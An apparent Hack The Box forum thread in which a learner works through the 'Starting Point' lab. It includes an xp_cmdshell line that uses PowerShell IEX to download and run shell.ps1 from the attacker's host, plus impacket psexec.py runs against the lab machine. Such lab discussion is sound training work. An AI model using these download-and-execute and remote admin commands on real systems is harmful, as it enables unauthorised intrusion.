Starting Point reverse shell through xp_cmdshell

xp_cmdshell "powershell “IEX (New-Object
Net.WebClient).DownloadString("http://10.10.14.218/shell.ps1\“);”
output


Exception calling “DownloadString” with “1” argument(s): “The remote server returned an error: (404) Not Found.”

At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.218/sh

  • 
      + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException      
    
      + FullyQualifiedErrorId : WebException                                         
    
                                                                                     
    
    

NULL

The error message implies that you aren’t serving a file called shell.ps1 on your server.

Make sure wherever you are running the server from has shell.ps1 in the same folder.

This might also be useful FootHold Starting point - #4 by technopy - Machines - Hack The Box :: Forums

I tried that thread earlier but nothing worked
Also the how to put the file on the server?

Thank you

@TheAnarchist21 said:

I tried that thread earlier but nothing worked
Also the how to put the file on the server?

Ok - just to check I understand the situation:

  • is your IP address (tun0 interface) 10.10.14.218?
  • are you running a webserver on port 80, possibly along the lines of python3 -m http.server 80 or python -m SimpleHTTPServer 80 ?
  • do you have a file called shell.ps1 in the same folder as where you have started the server?

Yes, my IP address is 10.10.14.218
pyhton -m http.server 80
Yes, i redid everything from the start and it worked i don’t know how
Thank you.
Although I’m stuck now at the psexec.py it’s saying that cannot be found or no such file or directory

So when it says the file cant be found it generally means some element of the path is incorrect.

If you are running this on Linux you may (depending on your OS) need to specify the exact location. You can find this with something like locate psexec.py or which psexec.py or even find (find / -name "psexec.py" 2>/dev/null).

Then if it isnt on your path, you can invoke it by using the full path - for example if it was in /usr/share/some/folder/ you could run it with /usr/share/some/folder/psexec.py

It may also need python first - so some trial and error is needed.

I located the file
and I followed the tutorial

python3 psexec.py administrator@10.10.10.27

Traceback (most recent call last):
File “psexec.py”, line 10, in
import src
ModuleNotFoundError: No module named ‘src’
This was the result.
Thank you again.

@TheAnarchist21 said:

I located the file
and I followed the tutorial

Awesome

python3 psexec.py administrator@10.10.10.27

Traceback (most recent call last):
File “psexec.py”, line 10, in
import src
ModuleNotFoundError: No module named ‘src’
This was the result.
Thank you again.

So, I suspect this is a version of psexc.py that is set for python2.

There are a few things to try:

  • first, the default response to a missing python module should be to try and install it (start with pip install src and see if that works)
  • if that doesn’t help, try python2 psexec.py administrator@10.10.10.27
  • if that doesnt help try to reinstall the impacket tools.

So this happened:

root@kali:/home/kali/Documents/HackTheBox# python3 psexec.py
Traceback (most recent call last):
File “psexec.py”, line 10, in
import src
ModuleNotFoundError: No module named ‘src’
root@kali:/home/kali/Documents/HackTheBox#
root@kali:/home/kali/Documents/HackTheBox# pip install src
Collecting src
Downloading src-0.0.7.zip (6.3 kB)
Building wheels for collected packages: src
Building wheel for src (setup.py) … error
ERROR: Command errored out with exit status 1:
command: /usr/bin/python3 -u -c ‘import sys, setuptools, tokenize; sys.argv[0] = ‘"’"’/tmp/pip-install-wqk5cigy/src/setup.py’“'”‘; file=’“'”‘/tmp/pip-install-wqk5cigy/src/setup.py’“'”‘;f=getattr(tokenize, ‘"’“‘open’”’“‘, open)(file);code=f.read().replace(’”‘"’\r\n’“'”‘, ‘"’"’\n’“'”‘);f.close();exec(compile(code, file, ‘"’“‘exec’”’"‘))’ bdist_wheel -d /tmp/pip-wheel-xy366zqw
cwd: /tmp/pip-install-wqk5cigy/src/
Complete output (41 lines):
running bdist_wheel
running build
running build_py
creating build
creating build/lib
creating build/lib/src
copying src/init.py → build/lib/src
running egg_info
writing src.egg-info/PKG-INFO
writing dependency_links to src.egg-info/dependency_links.txt
writing entry points to src.egg-info/entry_points.txt
writing requirements to src.egg-info/requires.txt
writing top-level names to src.egg-info/top_level.txt
reading manifest file ‘src.egg-info/SOURCES.txt’
reading manifest template ‘MANIFEST.in’
writing manifest file ‘src.egg-info/SOURCES.txt’
Traceback (most recent call last):
File “”, line 1, in
File “/tmp/pip-install-wqk5cigy/src/setup.py”, line 70, in
setup(
File “/usr/lib/python3/dist-packages/setuptools/init.py”, line 163, in setup
return distutils.core.setup(**attrs)
File “/usr/lib/python3.8/distutils/core.py”, line 148, in setup
dist.run_commands()
File “/usr/lib/python3.8/distutils/dist.py”, line 966, in run_commands
self.run_command(cmd)
File “/usr/lib/python3.8/distutils/dist.py”, line 985, in run_command
cmd_obj.run()
File “/usr/lib/python3/dist-packages/wheel/bdist_wheel.py”, line 225, in run
install = self.reinitialize_command(‘install’,
File “/usr/lib/python3/dist-packages/setuptools/init.py”, line 217, in reinitialize_command
cmd = _Command.reinitialize_command(self, command, reinit_subcommands)
File “/usr/lib/python3.8/distutils/cmd.py”, line 305, in reinitialize_command
return self.distribution.reinitialize_command(command,
File “/usr/lib/python3.8/distutils/dist.py”, line 950, in reinitialize_command
for sub in command.get_sub_commands():
File “/usr/lib/python3.8/distutils/cmd.py”, line 324, in get_sub_commands
if method is None or method(self):
File “/usr/lib/python3.8/distutils/command/install.py”, line 675, in has_lib
return (self.distribution.has_pure_modules() or
AttributeError: ‘NoneType’ object has no attribute ‘has_pure_modules’

ERROR: Failed building wheel for src
Running setup.py clean for src
Failed to build src
Installing collected packages: src
Running setup.py install for src … error
ERROR: Command errored out with exit status 1:
command: /usr/bin/python3 -u -c ‘import sys, setuptools, tokenize; sys.argv[0] = ‘"’"’/tmp/pip-install-wqk5cigy/src/setup.py’“'”‘; file=’“'”‘/tmp/pip-install-wqk5cigy/src/setup.py’“'”‘;f=getattr(tokenize, ‘"’“‘open’”’“‘, open)(file);code=f.read().replace(’”‘"’\r\n’“'”‘, ‘"’"’\n’“'”‘);f.close();exec(compile(code, file, ‘"’“‘exec’”’“‘))’ install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src
cwd: /tmp/pip-install-wqk5cigy/src/
Complete output (2 lines):
running install
You’ve probably made a mistake here and are trying to install from a ‘src’ directory which doesn’t exist.
----------------------------------------
ERROR: Command errored out with exit status 1: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '”‘"’/tmp/pip-install-wqk5cigy/src/setup.py’“'”‘; file=’“'”‘/tmp/pip-install-wqk5cigy/src/setup.py’“'”‘;f=getattr(tokenize, ‘"’“‘open’”’“‘, open)(file);code=f.read().replace(’”‘"’\r\n’“'”‘, ‘"’"’\n’“'”‘);f.close();exec(compile(code, file, ‘"’“‘exec’”’"‘))’ install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src Check the logs for full command output.

thanks again XD

Also I tried python2 it didn’t work.

Ok, then it looks like its the third option. I dont know what else to suggest.

Okay thank you so much.

python3.8 psexec.py administrator@10.10.10.27
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[] Requesting shares on 10.10.10.27…
[
] Found writable share ADMIN$
[*] Uploading file IiPAmKEF.exe


and it pauses, don’t execute the others operations